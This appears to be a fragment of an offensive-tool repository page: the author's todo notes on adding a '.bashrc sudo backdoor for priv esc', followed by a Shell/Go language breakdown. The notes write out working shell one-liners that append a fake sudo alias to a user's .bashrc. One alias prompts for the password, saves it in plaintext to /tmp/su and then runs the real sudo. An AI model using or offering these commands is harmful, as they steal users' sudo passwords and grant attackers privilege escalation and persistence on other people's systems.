'echo 'alias sudo="/somewhere/in/the/filesystem/sudo"' >> ~/.bashrc' to implement. Not tested yet.
Impliment .bashrc sudo backdoor for priv esc.
'alias sudo='echo -n "[sudo] password for $USER: " && read -r password && echo "$password" >/tmp/su && /usr/bin/sudo $@' >> .bashrc' <--- kinda jenky. will be noticed by anyone paying attention.
Description
Languages
Shell
63.2%
Go
36.8%